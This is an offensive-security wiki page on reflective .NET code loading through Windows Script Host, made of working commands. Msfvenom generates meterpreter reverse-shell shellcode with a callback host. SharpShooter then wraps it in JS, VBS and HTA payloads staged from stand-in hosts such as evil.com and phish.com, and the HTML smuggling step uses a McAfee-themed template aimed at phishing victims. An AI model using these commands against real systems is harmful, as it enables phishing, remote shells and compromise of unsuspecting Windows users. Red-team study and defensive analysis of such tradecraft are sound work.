Loading .NET Assembly from Windows Script Hosting
MITRE ATT&CK™ Reflective Code Loading - Technique T1620
Theory
You can load and execute .NET (C#) assemblies directly into memory from a compiled binary using Jscript, VBScript, or VBA Mcros, by using the DotNetToJScript technique from James Forshaw.
As double-clicking .js
or .vbs
or other script files on Windows will by default execute them through the Windows-Based Script Host, this technique can efficiently be used for phishing and even phishing with HTML Smuggling.
Practice
SharpShooter (Python) can be used to creat payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object.
SharpShooter supports both staged and stageless payload execution.
Stagless payload will embed the whole .NET in the generated file.
Staged payloads will attempt to retrieve a CSharp source code file that has been zipped and then base64 encoded using the chosen delivery technique (DNS or HTTP). The CSharp source code will be downloaded and compiled on the host using the .NET CodeDom compiler. Reflection is then subsequently used to execute the desired method from the source code. A summary of how SharpShooter operates during staging is shown in the diagram below:
However for both types of payload, we should first generate a shellcode.
# Generate a shellcode for stagless payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.121 LPORT=443 -f raw -o msf.raw
# Generate a shellcode for staged payloads
# The shellcode file should only contain the raw bytes, not the variable definition. For example byte[] buf = new byte[999] { 0x01, 0x02, 0x03 … would mean the shellcode file would contain just 0x01, 0x02, 0x03.
msfvenom -p windows/x64/exec CMD=calc.exe -f csharp > /tmp/raw.cs; cat /tmp/raw.cs |sed 's/byte\[\] buf = new byte\[[0-9]\+\] {//g' |sed 's/};//g' > msf.raw
When generating HTA payloads, we should always use 32-bit shellcodes due to mshta.exe being a 32-bit binary.
Stagless Payloads
We can now generate stageless payloads as follows.
# --payload: Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk
# --dotnetver: Target .NET Version: 2 or 4
# --stageless: Entire generated payload will be transferred at once (no HTML smuggling)
# Embedding a .NET assembly in JScript
sharpshooter --payload js --dotnetver 4 --stageless --rawscfile msf.raw --output evil
# Embedding a .NET assembly in VBScript
sharpshooter --payload vbs --dotnetver 4 --stageless --rawscfile msf.raw --output evil
Stagled Payloads
We can generate stageled payloads as follows.
# --payload: Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk
# --dotnetver: Target .NET Version: 2 or 4
# --com: COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
# --delivery: Delivery method for the stage: web, dns, both
# --web: URI for web delivery
# --shellcode: Use built in shellcode execution
# --template: HTTP Template for the HTTP generated file (for delievry)
# --smuggle: Smuggle payload into generated HTTP
# HTTP Smuggling Delivery + Staged Payload to retreive the .NET to execute (in JScript)
sharpshooter --payload js --dotnetver 2 --shellcode --scfile msf.raw --output evil --delivery web --web http://www.evil.com/evil.payload --smuggle --template mcafee
For previous example, SharpShooter will have created 3 separate files in the output directory, evil.html, evil.js and evil.payload.
evil.js: JavaScript payload that the user will eventually execute. If you are using HTML smuggling, this file does not need to be sent to the user, it’s provided purely for information and debugging purposes.
evil.html: is the HTML file that we will ultimately coerce the user in to opening by whatever means. This file contains the encrypted copy of evil.js which is decrypted using JavaScript then served to the user using the navigator.mssaveBlob technique.
evil.payload: is the C Sharp source code that will be retrieved, compiled and executed on the target host. In this case, the file contains a harness that will execute the supplied shellcode. The source code file is zipped then base64 encoded. The file should be hosted at the URI
http://www.evil.com/evil.payload
Alternatively, we can retreive a custom .NET from our staged payload:
# Custom .NET inside VBS
sharpshooter --dotnetver 4 --payload vbs --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee
Resources
Last updated
Was this helpful?